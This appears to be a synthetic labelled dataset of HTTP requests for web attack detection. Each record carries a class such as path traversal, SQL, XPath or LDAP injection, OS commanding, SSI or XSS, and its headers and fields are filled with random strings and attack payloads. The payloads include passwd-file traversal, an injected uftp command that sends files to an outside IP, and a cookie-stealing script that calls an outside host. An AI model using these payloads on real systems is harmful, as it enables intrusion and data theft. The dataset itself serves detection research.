End - Id: 46632
Start - Id: 36287
class: PathTransversal
GET /nn/nAZzTf4S/tXjN4NZ14K7-lq/umyte6trAeij0rhvaoeu.gif?T2P7R9usr=6210&nhisc65ouT=c-f&Odrt=8&retar=eFbediv&asxe7r0=ot3zdsr&tDtmhllnoar5u=6jdCo&rhiajt=%2Fmochat&2G7xp_e=000&wlsaateus=%5C.%5C.%5C%2F%5C.%5C.%5C%2F%5C.%5C.%5C%2F%5C.%5C.%5C%2Fetc%5C%2Fpasswd%2500.html&mITQ4xGoW=k73I9PZcQ HTTP/1.0
Host: 226.115.209.34
Connection: 1et3
Accept: application/postscript, application/x-tar;q=0.4
Accept-Charset: *
Accept-Encoding: compress;q=0.2, identity
Accept-Language: mmatstue-n;q=0.3, dgs-uaz
Cache-Control: hee9neiv=j
Client-ip: 114.100.144.6
Cookie: 8iitiR1=t=%sek]zIcbgsoundtU>a sock_streamr
Cookie2: $Version="483"
Date: Mon, 13 Jul 09 17:50:07 GMT
ETag: W/"tkoJK.8fzDRFrof_-"
Expect: 100-continue
From: 7sEpze@hrhiarN7.de
If-Modified-Since: Wed, 27 Aug 08 04:00:10 GMT
If-Unmodified-Since: Sat, 05 Nov 05 20:02:08 GMT
If-Match: *
If-None-Match: *
If-Range: Sun, 04 Dec 05 10:07:48 GMT
Max-Forwards: 0
MIME-Version: 3.8
Pragma: zle='lljur'
Proxy-Authorization: NTLM aXVmc2llbjJSZ2VvSGVlc2wwdW90N2FvYWV6ZXRyYWg=
Authorization: Digest uri=/ohyil/aroargkr/gi5s/ifatlbm/wsnitgp.asp
Range: 59661-,9-,-7
Referer: http://npucI.de/plih/iiepasnr.shtml
TE: trailers
Trailer: Accept-Encoding
User-Agent: olB1zAAPj http://www.laht9s.ch
UA-CPU: StrongARM
UA-OS: Solaris
UA-Color: color16
UA-Pixels: 645x5981
Via: HTTP/6.7 www.eersm.tiff
Transfer-Encoding: compress
Upgrade: ye1nNS/5.5
Warning: 577 www.vkgsei.gif "nyhteteay" "Wed, 04 Jun 08 24:04:38 UTC"
X-Serial-Number: 3858869813582017
----: -----------
~~~~~: ~~~~~~~~~~~~~

null

End - Id: 36287
Start - Id: 41982
class: SqlInjection
GET /PCWsOOQgOsO/TfwZBvH@9/ndWd/eomrgtoeb/nKTxqiQH7WB5ZRGJL/axnj-d6uqbegxsPCt/ipl@/t0kyZd6n/aE.jISTm/g2ry6eTesy9emletm/ttuowe3veepddi/7qbsql7apqhuyco.jsp?snDPDehnsocq=0t7hOsp20ttMa&advpUc46=where&oenhciToy=%2Fu&ziaBZbi3bv=292640&5httpsrklogpcopyuz=f9c8afKrob&bc8u=u0VrKmnd&ieknHamlt4qm79b=p%5CRwitiqs&liwaahqooErrSc0=oss&di3doxrthaIOq=OR+++%27rxRllDiO%27+++LIKE+++++%27Sim%25%27&heZAsaoo8qqs=Pslitifu8detojEu&cmTaid=11a2SIIZCC&7hlclt=r&qtFTnrqs=rnCQW1c3HY&WauctdPo=+teehn%7EonugD&att=s HTTP/1.1
Host: www.6ce2.uk:80
Connection: keep-alive
Accept: application/*, audio/*;q=0.6, audio/x-wav
Accept-Charset: x-mac-turkish, hz-gb-2312
Accept-Encoding: identity, identity;q=0.7
Accept-Language: b36hnao-t7pu;q=0.3, e5Dgld-foyl1E;q=0.1, ehsGnGF-Exaul, t1s-bmtniks, a-75;q=0.0
Cache-Control: max-stale=66984
Client-ip: 41.133.176.17
Cookie: nisd8enca=pcrl;yth3hn1maee=vre
Cookie2: $Version="096"
Date: Sun, 26 Aug 07 22:59:02 GMT
ETag: "H-wtGNRWTakDfVw7"
Expect: taus=aiyn
From: Iyirabt@mar7tEeeb7.de
If-Modified-Since: Mon, 24 Nov 08 05:30:00 GMT
If-Unmodified-Since: Tue, 13 Jan 04 06:18:48 GMT
If-Match: *
If-None-Match: "vwge@FysRj3zYHz"
If-Range: Tue, 14 Mar 06 20:51:52 CET
Max-Forwards: 389
MIME-Version: 0.8
Pragma: otniwcif='n7l'
Proxy-Authorization: Digest uri=http://Ih9gc.net/soss.txt
Authorization: Digest opaque="jpsg"
Range: -728027,84041-8,736156-
Referer: http://ntlo.gov/eetiaw.cfm
TE: gzip,trailers,trailers
Trailer: Accept-Charset
User-Agent: qr2lteeisTrt
UA-CPU: Sparc
UA-Disp: 4298,556,32
UA-OS: FreeBSD
UA-Color: color32
UA-Pixels: 8709x899
Via: 6ucKLt/1.7 www.betno.jpeg, FTP/6.9 219.111.145.75
Transfer-Encoding: iesoti; wnkq=0l28
Upgrade: tsem/9.8, icrMn/2.4
Warning: 119 141.109.167.27 "sebrw" 
X-Forwarded-For: 88.3.128.18
X-Serial-Number: 772384141
----: ----------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 41982
Start - Id: 48745
class: XPathInjection
GET /yinlwsedade/keeeqctcldhneenlic/aln/WfvqTLq5q-4/eZ8K3Tk_/5sneRux9mal9dttnpc/pimhb0/kOAATxjJObqiMqWQMfMX/kTOii/Hd./heee2thiaocseolil.png?ege=+tvarl&dAoSle=mslMSOM6V&ry=stdinudroppa80+u%5Btmp&rdhhw=bdr&o7Seorctltzken=ssc-f&mAqHsLl=xtermmwp-u7deleteae&VndNinsert=4ti%29bin&aoFtarllatahe=res1hDgEvNkalcreh&dcS_w0dn=9450&eoLk=eTb2n&sv=eusr&6u2Ritxv=2++++or+++count%28path%2Fchild%3A%3Anode%28%29%5Bposition%28%29%3D%28%28i%2Bj%2Bk%2Bl%2B1%29%5D++++%7C+++++path%2Fchild%3A%3A*%28%29%5Bposition%28%29%3D%28k%2B1%29%5D%29%3D1++++or+++53845%3D&5nesqlpStetel=sNEweval HTTP/1.1
Host: 22.9.61.80
Connection: keep-alive
Accept: */*
Accept-Charset: windows-1254;q=0.0, cp-950;q=0.6, windows-1252;q=0.8, iso-8859-8-i;q=0.4
Accept-Encoding: gzip
Accept-Language: xri-ohor;q=0.1, gv-erPOe, dnesl-en, sTp-leNalhr;q=0.3, c6r-3
Cache-Control: only-if-cached
Client-ip: 52.241.218.21
Cookie: suonparnitse=kdetaw
Cookie2: $Version="1"
Date: Sun, 26 Sep 04 19:46:41 CET
ETag: W/"wDVmiBiB1QJn8Eo"
Expect: 1en3eIew=aerZEoo
From: lYglyt2@7smfrhi.org
If-Modified-Since: Tue, 06 Jan 04 06:57:16 GMT
If-Unmodified-Since: Mon, 16 Jul 07 23:24:36 CET
If-Match: "uT-ue5yiX1eUubDT."
If-None-Match: *
If-Range: Sun, 09 Sep 07 09:32:50 CET
Max-Forwards: 94
MIME-Version: 9.4
Pragma: no-cache
Proxy-Authorization: Digest opaque="dmhss"
Authorization: taabj 5aosui=4vni8R0
Range: -506333,18704-151605
Referer: /reEo.css
TE: gzip,gzip;q=0.7,chunked
Trailer: Via
User-Agent: odb96lcH http://www.a3msepdi.ch
UA-CPU: Sparc
UA-Disp: 383,7036,16
UA-OS: Windows 98
UA-Pixels: 9907x836
Via: 2.0 www.nNmdo1t.htm, 9.0 179.133.73.65
Transfer-Encoding: compress
Upgrade: asd/1.5, Ttn35k/8.5
Warning: 110 www.nsio.html "gbuonm" "Sun, 29 Jul 07 09:27:30 CET"
X-Forwarded-For: 55.147.33.124
X-Serial-Number: 265535777881770929
----: ------------------------------------------------
~~~~~: ~~~~~~~~~~

null

End - Id: 48745
Start - Id: 48586
class: XPathInjection
PUT /D2gutou1.css? HTTP/1.0
Content-Length: 390
Content-Language: Hre,lO,oue
Content-Encoding: gzip
Content-Location: /oMtessr/potf/exeau/tBenai.php3
Content-MD5: NnJsZUxDbHlpYU5tME9pZA==
Content-Type: application/x-www-form-urlencoded
Expires: Mon, 06 Nov 06 05:05:19 UTC
Last-Modified: Tue, 11 Oct 05 06:34:50 CET
Host: www.njehiYb.com
Connection: keep-alive
Accept: audio/x-wav;q=0.1, image/png;q=0.3
Accept-Charset: *
Accept-Encoding: *
Accept-Language: *;q=0.2
Cache-Control: max-age=8231
Client-ip: 58.151.109.14
Cookie: 5Vz-SR@=cthaaira9Ra;tu=3387;m0tAtqaazd=54731257;0nn31=re]eiair1
Cookie2: $Version="380"
Date: Mon, 28 Sep 09 07:32:03 UTC
ETag: W/"g6dEmBv81@mImtM6koU@"
Expect: 100-continue
From: ebiq@eeIse.it
If-Modified-Since: Wed, 26 Apr 06 08:51:00 CET
If-Unmodified-Since: Wed, 03 Mar 04 18:50:29 GMT
If-Match: *
If-None-Match: "r-cV4nOGbLmGn0hdDQ"
If-Range: Tue, 21 Jul 09 23:39:00 UTC
Max-Forwards: 423
MIME-Version: 2.8
Pragma: no-cache
Proxy-Authorization: Digest response="7fFB26efC9Fd9d2Aac334296DcDC1b71"
Authorization: Basic N2V6cjphZXVxaWk3
Range: -0509
Referer: http://www.uian.cz/hria4rtn/ecuaetaa/ilyrej/ju8fhl/wlirs.rar
TE: deflate;q=0.1,trailers
Trailer: Pragma
User-Agent: Htsen/9.9.2
UA-CPU: 68000
UA-Disp: 2986,5659,32
UA-OS: FreeBSD
UA-Color: color8
UA-Pixels: 853x5228
Via: 1.9 www.ierale.css
Transfer-Encoding: ctoo
Upgrade: xRgntq/5.9, 80qw6/9.4, rSdi/2.7, ttopmd/4.9
Warning: 003 60.71.243.7 "olt7lttIl5tS" "Mon, 09 Jun 08 19:36:33 GMT"
X-Forwarded-For: 60.213.229.203
X-Serial-Number: 41138293275827237103
----: ---------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

netearjN5gwjc2e=znkt&eirol9ph0a=e3:e&esOSoear=7667162&soupdwmesiHo4=8&eden=ie9ac'  or   (i  <   count(lE/child::text())     and   j <    count(hecerm/child::comment())    and k     <     count(ii/child::*)    )    or     'uO'    =  ' eALut6'  or&uoDip=:ursjaR&6r=rn fs5v~t&qbPIMqprocessing-instructionnLpa=ddaedn&ie4ySsb8=s9

End - Id: 48586
Start - Id: 43119
class: OsCommanding
GET /nDgk1rjlNAbYn3Jht/to/s3N0L3/nolirsOqxmiuuyg/AhaH/qiyOyetaoqheza9ib/wmYSmuNvOX.png?xbP0a0hv-tmpu=%27%3Buftp+++++-g++%2Fhome%2Fmerinsorit%2Ferveesol+146.234.140.12+++++%2Fge++%3B HTTP/1.0
Host: 135.149.218.53
Connection: close
Accept: audio/basic
Accept-Charset: windows-1250
Accept-Encoding: *;q=0.8
Accept-Language: egan-e6cOj6, epournqn-njTnjrs;q=0.3
Cache-Control: louc='5yfamgs'
Client-ip: 147.97.228.238
Cookie: vraaSg=yac;3s1Qtfrom_7=54849
Cookie2: $Version="389"
Date: Sat, 10 Feb 07 19:21:02 CET
ETag: "C-hPZ3ueFN8_yN2Vv"
Expect: kree4Ne
From: orsuA@ouiy.de
If-Modified-Since: Thu, 04 Feb 10 19:34:00 UTC
If-Unmodified-Since: Thu, 07 Feb 08 22:30:03 UTC
If-Match: "8nExH9vu0tHcfrJK"
If-None-Match: "kdmInhjGX8@PH0Zx1S"
If-Range: Thu, 23 Jun 05 05:33:35 GMT
Max-Forwards: 182
MIME-Version: 9.7
Pragma: TI7holwt=r
Proxy-Authorization: NTLM U3RsZWhhcHRlVGE4bG9zYWVocnNYYWFhc3lsajd0ZVV0aDhsbm9ocmFpYQ==
Authorization: Digest cnonce="sodp"
Range: 94856-,22-022
Referer: http://www.t9ltihew.biz/3eytx/5medehet.pl
TE: deflate;q=0.4
Trailer: Host
User-Agent: san6idin37
UA-CPU: StrongARM
UA-Disp: 046,4473,8
UA-OS: Win98
UA-Color: color8
UA-Pixels: 603x2268
Via: 6.9 193.76.199.23, 8.3 www.anis92.tiff
Transfer-Encoding: identity
Upgrade: gst/8.6
Warning: 169 190.90.41.27 "mteulHh6dilaof" 
X-Forwarded-For: 204.73.145.24
X-Serial-Number: 306986025864028
----: ------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 43119
Start - Id: 43900
class: OsCommanding
GET /PBServer/..��../..��../..��../winnt/system32/cmd.exe?/c+dir+c:0 HTTP/1.0
Host: www.wesp4.net:80
Connection: close
Accept: */*;q=0.7
Accept-Charset: macintosh;q=0.6
Accept-Encoding: 
Accept-Language: e-yt;q=0.6, l-r;q=0.7, mhvlibsd-rri
Cache-Control: min-fresh=72674
Client-ip: 148.75.122.55
Cookie: iauZteY6q=886;he=dw6raatNb;pgyetteqaf3r6=r1~at;0otndXotbOw=8itslws4;oqeaoo8=8612357245
Cookie2: $Version="6"
Date: Fri, 01 Dec 06 20:30:10 GMT
ETag: "Ep17MfiXz7naL9aGqdZ"
Expect: 100-continue
From: pni8hEt@brlOo.ch
If-Modified-Since: Fri, 07 Apr 06 15:48:31 CET
If-Unmodified-Since: Thu, 09 Apr 09 09:56:41 GMT
If-Match: "jKUn1uB_dS@PuHGmr"
If-None-Match: "YPxlz7._xFR2j-Bam"
If-Range: "K6OVcQeIC12Aj7ZG"
Max-Forwards: 0
MIME-Version: 3.7
Pragma: no-cache
Proxy-Authorization: NTLM dGxFdHRpbnNuZXRwZmlwU2NjcGVucmk5bWFkbXFhbGhlb2FmZQ==
Authorization: Basic MnJ0aWxpdjc6bGlybw==
Range: 3121-127,822-
Referer: /t39ohA/Niswwoav.gz
TE: chunked;q=0.2,chunked;q=0.2,gzip
Trailer: If-Match
User-Agent: Mozilla/7.1 (X11; U; Linux i386 5.3; lm-ra; rv:3.9.0) Gecko/11237719
UA-CPU: StrongARM
UA-Disp: 8243,837,16
UA-OS: Windows 95
UA-Color: color8
UA-Pixels: 349x5070
Via: 9.0 239.185.121.92:97478
Transfer-Encoding: deflate
Upgrade: ortfne/8.2, salte5/1.5, cvetd/0.8, 6s75ea/4.7
Warning: 453 28.223.229.127 "anutRoc7" 
X-Forwarded-For: 206.43.118.58
X-Serial-Number: 83787585359566262
----: ----------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 43900
Start - Id: 49580
class: XPathInjection
GET /pDoLOO9L/Nidi6URdeIeoEd6u/hc@tKrNrNoLHiTezH/eVUc3/lu/eI_BKa5awP_SY@.tiff?tNZmeeovebwwydt=thui%27++++or++++count%28+path%2Fchild%3A%3Anode%28%29%5Bposition%28++++%29%3D%28%28i+%2B+j++%2B+++k++++%2Bl+++%2B+1%29%5D+++++%7C++++path%2Fchild%3A%3A*%28%29%5Bposition%28%29%3D%28k%2B1%29%5D%29%3D1+++or+++++%27adneyNn%27%3D+%27+++h2aoSlO%27+++or HTTP/1.0
Host: www.4rier.org:80
Connection: close
Accept: */*
Accept-Charset: *;q=0.3
Accept-Encoding: 
Accept-Language: *
Cache-Control: E6oLeyc='9uN2'
Client-ip: 220.102.210.201
Cookie: ie=ett4;eaosoen1oslcoe=T%u7;jus=3jdcOr5sb/\e;SeaftaR=echocgo~m;biEar5g5rle=7&rnesoe;iAholi=068877
Cookie2: $Version="6"
Date: Mon, 08 Mar 10 01:18:53 UTC
ETag: W/"YFZfC3EFAsdDtGiQX@"
Expect: cadfTae=6qeeI
From: xAlQbr@oetAt.gov
If-Modified-Since: Mon, 15 Aug 05 22:19:12 UTC
If-Unmodified-Since: Wed, 03 Aug 05 09:14:43 GMT
If-Match: "Ug3Z5HmEZSV3.ChgI9M"
If-None-Match: *
If-Range: *
Max-Forwards: 8100
MIME-Version: 6.0
Pragma: no-cache
Proxy-Authorization: Digest nonce
Authorization: 0ejre partissh=brdssh
Range: -191,56-,-47911
Referer: http://iallsad5.it/ush3s/ashhku/mpMe/psrtswe/Rocynmh.tiff
TE: chunked;q=0.7,gzip;q=0.4,trailers
Trailer: If-Unmodified-Since
User-Agent: eRiro8a
UA-CPU: PowerPC
UA-Disp: 3990,9142,8
UA-OS: Solaris
UA-Color: color8
UA-Pixels: 2073x766
Via: 9.0 59.254.79.224:3497, 6.2 www.atewfme.shtml:443
Transfer-Encoding: heatxe; veeddi=2ige18
Upgrade: w3tun/4.7, nll2c/3.7, iotwG/2.5, ialro/2.8, zf5q/7.2
Warning: 497 53.69.32.200 "2sutvHa56sEcoGpl" "Mon, 17 Oct 05 23:56:09 GMT"
X-Forwarded-For: 192.195.46.225
X-Serial-Number: 9696710
----: -----------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 49580
Start - Id: 46437
class: PathTransversal
PUT /oO/oSaH.asmx? HTTP/1.0
Content-Length: 279
Content-Language: lefyfie
Content-Encoding: gzip
Content-Location: /slio4t.php
Content-MD5: aGVjcmxrb2hoc2NsZG9leQ==
Content-Type: application/x-www-form-urlencoded
Expires: Tue, 22 Feb 05 15:14:03 UTC
Host: www.ghoeRsvtrt.de
Connection: keep-alive
Accept: application/*;q=0.7
Accept-Charset: *
Accept-Encoding: ../../../../../../../../../etc/passwd
Accept-Language: \.\.\/\.\.\/\.\.\/\.\.\/\.\.\/\.\.\/\.\.\/etc\/passwd%00.html
Cookie2: $Version="954"
Date: Thu, 20 Jan 05 17:15:33 GMT
If-Match: *
If-None-Match: "Z1P0CdknSowzgf.ZH0"
If-Range: Sat, 28 Nov 09 11:37:57 UTC
Max-Forwards: 665
Authorization: Basic ZWhhb21kYXo6YTl1cmxl
Referer: http://www.QdnfE5sw.net/trte/ac7yh/ntgelsft.tar.gz
User-Agent: rass0t/8.7.7
UA-CPU: MIPS
UA-Color: color32
Via: e9aer/6.6 167.82.43.160
Transfer-Encoding: deflate
----: ----------------------------------------

eebet=ae&Kbfm3ZroUn=004785742&pfromeQJdocumentincludeH=nalh5&etrxuajb=9eP e|fs2rea~N9rm&eaeowpDtssEief=axp_rekei&h2wgEt=sinputuAIki<r&orgdeteo=itLhiC tnynoa|&sR2slf=i6spooiioetd&aFBe8=8Eh0m&natRshe=cGmtE&tor5odAy=efkCc&lsrTieeoaa=10516&prth5c==e0scriptne nullc<tmailk

End - Id: 46437
Start - Id: 38667
class: LdapInjection
GET /1gVAxRkx/ed-5_M-9g/t3l-1M/nqnneaee2sng/r37AJ4v/Qq.jpeg?julas3ef2d=lD+httpsn&ahdeeaskNmrHt=7386%29%28%26%28objectClass%3Dfgns%29%28%7C%28sn++%3D++St4i%29%28cn%3Dje+++++J*%29%29&fref4omTe4=0mef3hmi&ntte2drTt=8&positioniuqPB=hFBXnW3yN&osqtXg4iEhtlrs=64&wj6ldta=L22ansFho%3Fet HTTP/1.1
Host: www.Fetmyyn.ch
Connection: close
Accept: video/mpeg, text/xml;q=0.6
Accept-Charset: windows-874;q=0.8, windows-1251;q=0.0, windows-1255;q=0.2, hz-gb-2312;q=0.3
Accept-Encoding: *;q=0.5
Accept-Language: 9-lh;q=0.0
Cache-Control: no-store
Client-ip: 4.62.251.210
Cookie: jstnlrs7hrdl=Ilza ed p9Seta;umhaa2= o@c]ett;ARral=6;rsshirnNthk2en=ehecz8g%+;phesWiedveamB=12720541;uAyteo=748
Cookie2: $Version="129"
Date: Sun, 15 Oct 06 24:01:04 GMT
ETag: W/"O9@O-jxY9.LjYLQO"
Expect: 100-continue
From: 0dbnE@pDEweao.biz
If-Modified-Since: Fri, 25 Apr 08 11:42:30 UTC
If-Unmodified-Since: Sat, 15 May 04 03:37:53 UTC
If-Match: "rkeIlLUNvrgOuws"
If-None-Match: "NeoD1gfKW@JvORts_pF"
If-Range: Wed, 02 Sep 09 01:28:03 CET
Max-Forwards: 41
MIME-Version: 9.7
Pragma: ag=tpgaph
Proxy-Authorization: Basic ZTNpZGlzYzp0czFtb2VmYw==
Authorization: ar0yxt ehNhei=mtatep
Range: -3789,-5,300-00360
Referer: http://ie3erdf.it/mofoN2ee.css
TE: gzip;q=0.7,trailers
Trailer: Accept
User-Agent: Mozilla/4.6 (Windows; U; Win 9x 1.1; ep-ra; rv:1.2.4) Gecko/34326863
UA-Disp: 0550,3953,16
UA-OS: Solaris
UA-Pixels: 7709x7356
Via: o1r/1.1 www.nhorlir.htm, FTP/1.2 85.224.226.63
Transfer-Encoding: gzip
Upgrade: anRsj/9.4, 58agtG/6.3
Warning: 198 210.170.229.105 "HreisPeNtrsDzoqe7" "Mon, 01 Jun 09 16:10:48 CET"
----: -------------------

null

End - Id: 38667
Start - Id: 40691
class: SSI
GET /oO.css?eL2e=5667421&iei=%3C%21--+%23include++virtual%3D%22d%3A%5Cwindows%5Cautoexec.bat%22++--%3E&darychije=xfnMW&ne6ohedybnren=nno7o&JbinNSpn=4653666761&ene8ij=q+8&seau=16 HTTP/1.0
Host: www.cyuHr.biz:80
Connection: keep-alive
Accept: */*;q=0.1
Accept-Charset: *
Accept-Encoding: 
Accept-Language: ecSl6as4-tuaeww;q=0.4, gg-o;q=0.8, bCa-37ti;q=0.6, ydL8ne-ivE65T;q=0.6, teasina-hdxte
Cache-Control: max-age=02146
Client-ip: 194.79.71.60
Cookie: narb6l=hJpei;o3cb0hj0e=rhyn
Cookie2: $Version="75"
Date: Fri, 19 May 06 15:37:42 GMT
ETag: W/"0eL_e5ytPr8SH@PUA"
Expect: 100-continue
If-Modified-Since: Fri, 18 May 07 09:39:28 GMT
If-Unmodified-Since: Sat, 17 Mar 07 20:31:22 UTC
If-Match: *
If-Range: "hv_nnq8rA-10hHECM"
Max-Forwards: 5
Pragma: no-cache
Authorization: 7ppar rEyF66=ooa6
Referer: /nyeuU8rn/onhci/lstvh/eiyt.php
TE: deflate;q=0.2
User-Agent: Mozilla/7.3 (compatible; eennfCr; Windows NT; 8ma7NRw)
UA-OS: WinNT
Via: 6.3 94.76.92.185, FTP/1.5 www.9eyheu.jpg, 8.3 www.hxrtre.css
Transfer-Encoding: gzip

null

End - Id: 40691
Start - Id: 46715
class: XSS
GET /tF7ITr-/1gtArfreiecr0/8xcXSU4.css?sl=7&tw=erOe7&a0roOI=Eb&m3orth=63757815&uga=665&scenc=efso%3Caftureoelt&0TF0Cf1=r%3Cc&etsog1=iK3M&IqrooosieOheu=0316835&N8v98PRftpb=t4wyQHd89g HTTP/1.1
Host: 186.226.148.121:80
Connection: 1dnEksU
Accept: */*
Accept-Charset: *;q=0.5
Accept-Encoding: *;q=0.6
Accept-Language: 9-x, i4heir-G7donv, tnitt-i7orss;q=0.1
Cache-Control: max-age=77482
Client-ip: 51.173.51.38
Cookie: leSr=[\xC0][\xBC]script >[window.open('http://100.195.86.124/is.sh'+document.cookie);][\xC0][\xBC]/script  >;tmpBlformZXoQI=hS|cu
Cookie2: $Version="460"
Date: Sun, 17 Sep 06 16:47:23 UTC
ETag: W/"7U1jaltsL_Bh9D83"
Expect: 100-continue
From: ostn@eiEInxoue.gov
If-Modified-Since: Wed, 27 May 09 14:44:44 UTC
If-Unmodified-Since: Tue, 06 Apr 04 22:46:29 UTC
If-Match: "1CD767TqA7KbP7uF_L"
If-None-Match: "pNsQFdEXDFgfBnsGWQ"
If-Range: Tue, 26 Jul 05 06:27:03 GMT
Max-Forwards: 4
MIME-Version: 0.6
Pragma: no-cache
Proxy-Authorization: Basic T2dkbTp0bWh1d2c=
Authorization: ihcbb exeleel=osrInuo
Range: -86769,3-4,-55130
Referer: http://www.iotgi.org/noetllh/sr7e/Xtts1G/tgcoiyei.mpg
TE: trailers,trailers
Trailer: Proxy-Authorization
User-Agent: lodtntmye8mbn
UA-CPU: StrongARM
UA-Disp: 7583,8873,32
UA-OS: FreeBSD
UA-Pixels: 7522x520
Via: 9.9 161.97.202.42, Zasfew/3.3 www.k8hl7k.shtml
Transfer-Encoding: 6oea
Upgrade: ejac/8.8, baveD/4.5, eephoe/6.8
Warning: 285 www.repb.gif "ctyrNksignP" "Thu, 16 Aug 07 16:54:27 UTC"
X-Forwarded-For: 131.100.225.97
X-Serial-Number: 6715538420
----: ------------------------------------------
~~~~~: ~~~~~~~~~~~~~~

null

End - Id: 46715
Start - Id: 44997
class: PathTransversal
GET /hAu2bRYJHlnYALF/Ett7/LodhLrlgg7dit3/s81YRkwd-3/0NFxEI@RRU.u@fy9j3d/n1Lo-/vO5TQ5jXWlJ/iEQ@YLouCrvNtCdxVKY/ftmpcvSopen/lrlooerhoetr7E/2DjYZJAwinntkXSi@insertP/a3lbJe.php?oiadr=..%2F..%2F..%2Fusr%2Fdsqqdsqsd.xml&uM4PG8=SaAs&fshhrh4nujar=8&ernemgr=85818&njian2d=0ehnb&rbrrXAcet=zl%3A%40a%5B&ga=40879562&rpcpeievA=930218364&RHWlsd1X6A=sQEu8J19GWC&msnbm=tvu&ueerortnbf=nh+t&se=t+2stuef+%3AreobjectcS&flH6HJopenCboot.ini3style=7584576564&ZHmochajn3=ak9fp8ecu HTTP/1.1
Host: www.ba7ooSc.biz:80
Connection: close
Accept: text/*;q=0.9, video/*
Accept-Charset: iso-8859-1
Accept-Encoding: 
Accept-Language: *
Cache-Control: no-cache
Cookie: il=iSLe
Cookie2: $Version="420"
Date: Wed, 03 Mar 10 06:46:58 UTC
Expect: geoa=c7iean2o
From: SiHai3@Rl2imga.fr
If-Modified-Since: Wed, 12 Apr 06 16:10:50 UTC
If-Unmodified-Since: Wed, 05 Jul 06 08:37:33 GMT
If-Match: "vcNAWj4i2EIhvtQnGJc"
If-None-Match: "mN62FTj-AKEOiZM"
If-Range: *
Max-Forwards: 8584
MIME-Version: 6.7
Pragma: Erlbctap='ctsoedr'
Authorization: NTLM ZXJpNnJldGhrU2VkczFlbTl4ZWxlaVJ2R2d6bnJhdm9zTXpOaTRmaG5vMGJi
Referer: http://www.w2i5e.fr/lPcider/eehteq/rE3nr/ooeie.pl
TE: chunked;q=0.7,chunked
User-Agent: Mozilla/4.5 (X11; U; Linux i586 7.2; me-im; rv:7.3.8) Gecko/27462783
UA-Disp: 6840,695,32
UA-Pixels: 7442x124
Via: FTP/6.5 57.25.109.39
Transfer-Encoding: deflate
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 44997
Start - Id: 42750
class: SqlInjection
POST /jp3iZKmsMTl_/2AQ-8IWlL9IW5.dll? HTTP/1.0
Content-Length: 143
Content-Language: 0cus8he,hSsT
Content-Encoding: identity
Content-Location: /ssas/nnDoitY/ecyad/yiahT91/mLo0xxn.mpeg
Content-MD5: dGlldDNyZUVsaXVybmh3ZQ==
Content-Type: application/x-www-form-urlencoded
Expires: Thu, 10 Jan 08 05:13:27 UTC
Last-Modified: Wed, 05 Aug 09 22:02:35 CET
Host: www.Rwmr.be:80
Connection: close
Accept: image/gif;q=0.0, audio/*
Accept-Charset: iso-8859-7;q=0.7, koi8
Accept-Encoding: 
Accept-Language: *;q=0.8
Cache-Control: SneLdMo3='eobm'
Client-ip: 98.206.117.244
Cookie: MHL9=peaawd2;kerrtre0e2lA=' +   (   SELECT TOP  1     baeaessh     FROM     ETy)   +   ';idnullVRYcatv7=is?;Topr5f9latfI8ne=tn;
Cookie2: $Version="613"
Date: Wed, 02 Jun 04 03:06:05 UTC
ETag: "4t18lCZ0THj7QqO_u"
Expect: 100-continue
From: olec@itnahevEod.st
If-Modified-Since: Sat, 01 Nov 08 10:20:44 GMT
If-Unmodified-Since: Thu, 21 Jan 10 22:52:07 CET
If-Match: "e_kOdUyMtxIUG7Cf"
If-None-Match: "6eD3w7P0s@zDGiQ"
If-Range: "6w3T_YxE70-A9GX1@KH"
Max-Forwards: 94
MIME-Version: 7.2
Pragma: 6intrtm='uhokt5'
Proxy-Authorization: iurtN aqadDau=s2ape
Authorization: eeUKkv AhoaSg=ie3L
Range: -47883,920284-33663,-174
Referer: http://www.nmelp.com/fo8o4A.php3
TE: gzip;q=0.2,gzip;q=0.4
Trailer: Referer
User-Agent: Mozilla/3.3 (Machintosh; U; PPC 8.1; oo-41; rv:6.9.6) Gecko/71523234
UA-CPU: StrongARM
UA-Disp: 9938,911,32
UA-OS: WinNT
UA-Color: color32
UA-Pixels: 301x5874
Via: 6.4 www.ga9ladRt.shtml
Transfer-Encoding: gzip
Upgrade: pIH2t/5.2, nJs/4.7
Warning: 659 226.226.230.165:60604 "TKats3angumn" 
X-Forwarded-For: 133.180.69.1
X-Serial-Number: 1961149
----: -------------------------------------
~~~~~: ~~~~~~~~~~~

sro=p1pbuIHryn&tsstsdde=~3wErm&sbaWramdf1e=565&LHvFoqIRhtpassvfhttp=auaa4eeiYqOecH&HaEtrtn=263&U_@UkZ=65716773&r0an6yoa2=7oen&BJjlN4ei=etcste

End - Id: 42750
Start - Id: 38389
class: LdapInjection
GET /ihMgsiaqpnmateaoees/atspioees4q/mmirntrnhr/Z1@evalphpmQSYcmdjcs.mdb?C_-having=cmain&eW@_Roeetcr@=a0maf%29%28++%7C++++%28e13nN%3D*%29&9rceltozr=execiy&enhlteHm=a6Wcaqg&izya=Banenm&oJ32wiEv8F2U=s%5CmnfdoEyy%3BNNd&Hnrdtipstni=1Qm232nzaeTl&ecooileegNe=05&vhtB=62&nuuhLjlyEoitK3=aM5.K&onwijfj=19127827&sM=e%28e&ZmAJsI3p3M=81 HTTP/1.1
Host: 110.124.24.195
Connection: keep-alive
Accept: text/*, text/*;q=0.3, video/mpeg
Accept-Charset: *
Accept-Encoding: 
Accept-Language: *
Cache-Control: max-stale
Client-ip: 132.227.216.21
Cookie: e87inyTss=84878050;ec5eoowE2m=$uera+adsystemBz>;iFUlogOV=23;MnetcatNo=729831;1r5rm=hmetaeaO;8b79=2304
Cookie2: $Version="662"
Date: Sat, 18 Nov 06 17:30:23 GMT
ETag: W/"yNFl3unHM9j-nY_lvkD"
Expect: uFhie
From: e3ig@cUsnasr.com
If-Modified-Since: Thu, 29 Sep 05 01:44:50 GMT
If-Unmodified-Since: Sun, 25 Jul 04 08:39:03 CET
If-Match: "R4xPtV2oP8npzAVEVCq2"
If-None-Match: "EuKkXGg1N0acMHJp@ent"
